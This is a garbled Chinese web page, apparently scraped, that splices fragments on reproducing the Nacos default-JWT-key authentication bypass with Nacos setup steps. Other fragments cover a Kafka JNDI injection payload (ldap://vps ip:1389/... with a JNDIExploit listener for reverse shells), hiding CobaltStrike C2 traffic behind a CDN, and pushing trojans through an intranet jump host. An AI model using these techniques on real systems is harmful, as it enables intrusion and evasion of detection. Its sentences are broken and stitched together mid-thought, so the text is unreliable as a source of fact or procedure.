阿一网络安全学院之Nacos⾝份认证绕过漏洞复现

nacos是阿里巴巴的一个开源项目，旨在帮助构建云原生应用程序和微服务平台，在

5.{nacos-server-2.0.0安装目录}\nacos\conf\application.properties，放开如下注释并按实际配置。2.创建mysql数据库，并初始化数据库，{nacos-server-2.0.0安装目录}\nacos\conf\nacos-mysql.sql。6.启动验证，访问http://ip:8848/nacos，默认用户名密码nacos/nacos。nacos开启权限认证，如何配置，应用如何配置？7.nacos开启权限认证，如何配置，应用如何配置。

目前nacos越来越广泛，大多数的企业在使用微服务架构的时候，基本上都会选择nacos作为注册中心和配置中心。那nacos其实也是阿里开源的一个项目，存在漏洞，至少难免的。那我们今天就来分享一下nacos存在的漏洞问题，主要是一些安全漏洞的问题。毕竟现在很多政务的项目，都会做等保测试这块。等保做得多了，漏洞也就多了。这不，今天就又有一个漏洞了。那就开始修复喽！！！

本文仅做复现，不做分析！其实就是默认keyshiro550exchange的jwt伪造等，都是类似的问题。Nacos是一个易于使用的平台，专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞()，开源服务管理平台Nacos在默认配置下未对进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。基本上都受到了影响，最新的版本已修复漏洞。

漏洞原理为开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改，导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。

2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统，Kafka 可以处理⼤量的消息和数据流，具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar：监听，可反弹shell。的特点，⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞，可通过该漏洞在服务器端任意执⾏代码，写⼊后⻔，获取服务器权限，进⽽控制整个。

原版的CobaltStrike存在某些未授权访问漏洞，以及特征太过于明显，以至于很容易被C2检测器发现。本文记录了一些隐藏特征的方法，这些方法不涉及更改cs底层jar文件，适合小白（指自己）快速部署。本文目标：从流量、端口、访问页面等方面尽可能隐藏cs流量，运用cdn实现IP隐匿，同时实现linuxC2通讯功能。

安全人员在遇到突发事件后所采取的措施和行动。发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。信息安全生命周期的必要组成部分，这个生命周期包括：对策、检测和响应。运维人员无法迅速处理安全事件时，需要第三方厂商提供一种能发现并解决问题的有效服务手段。控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。以最快速度恢复系统的保密性、完整性和可用性，阻止和减小安全事件带来的影响。积极预防、及时发现、快速反应、确保恢复。

直接去目标机器执行了一下木马，是可以上线的，也许真实场景可以想办法的钓鱼让目标主动点击。若目标机器无法出网，就得让同处于内网的跳板机，采取正向或者反向连接的方式进行上线了。已知开放了这些端口，且我们拥有域控密码信息，尝试另外一种上线方式，让跳板机。可以直接在跳板机上新建监听，然后转发上线，但生成的木马免杀有点难操作。没有拿下，这台机器开了防火墙，直接通过。进行内网信息收集，得知域控机器。，并设置定时任务运行，从而上线。进程上，无法成功，遂找了个。，但这样操作的前提是建立在。通过之前抓取的密码，建立。

nacos是阿里巴巴的一个开源项目，旨在帮助构建云原生应用程序和微服务平台，nacos在默认情况下未对token.secret.key进行修改，导致攻击者可以绕过密钥认证进入后台。也就是nacos的密钥是有默认值的，其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击对于jwt加密 其实就是用了base64 密钥是写死在源码里面的 所以直接可以用jwt伪造攻击对应就是数据包的accesstoken。正在学习网络安全的小伙伴，有需要安全资料或者CISP资料的可以关注。”可领取网络安全书籍。

Nacos身份绕过漏洞复现（QVD-2023-6271）

Nacos 身份认证绕过漏洞

使用JWT时，通常需要使用密钥对token进行签名，确保token在传输过程中不被篡改。，开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。在构造时要注意下时间戳，需要换算一下，比你系统时间要晚一些，比如当前时间时2024年4月12日，在时间戳时间时13日。在登录请求中，拦截数据包，添加Authorization信息，拦截放回包后放包。访问两个网站，一个是时间戳网站，一个是JWT的。

JSON Web Token (JWT)是一个开放标准(RFC 7519)，它定义了一种紧凑的、自包含的方式，用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任，因为它是数字签名的。 在线解密查看内容：

2020年12月29日，Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞，攻击者可以进行任意操作，包括创建新用户并进行登录后操作。

目录 漏洞描述 影响版本 docker-compose文件一键搭建漏洞环境 漏洞复现 修复建议 漏洞挖掘 自动化探测脚本POC nacos：Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 漏洞描述 2020年12月29日，Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可.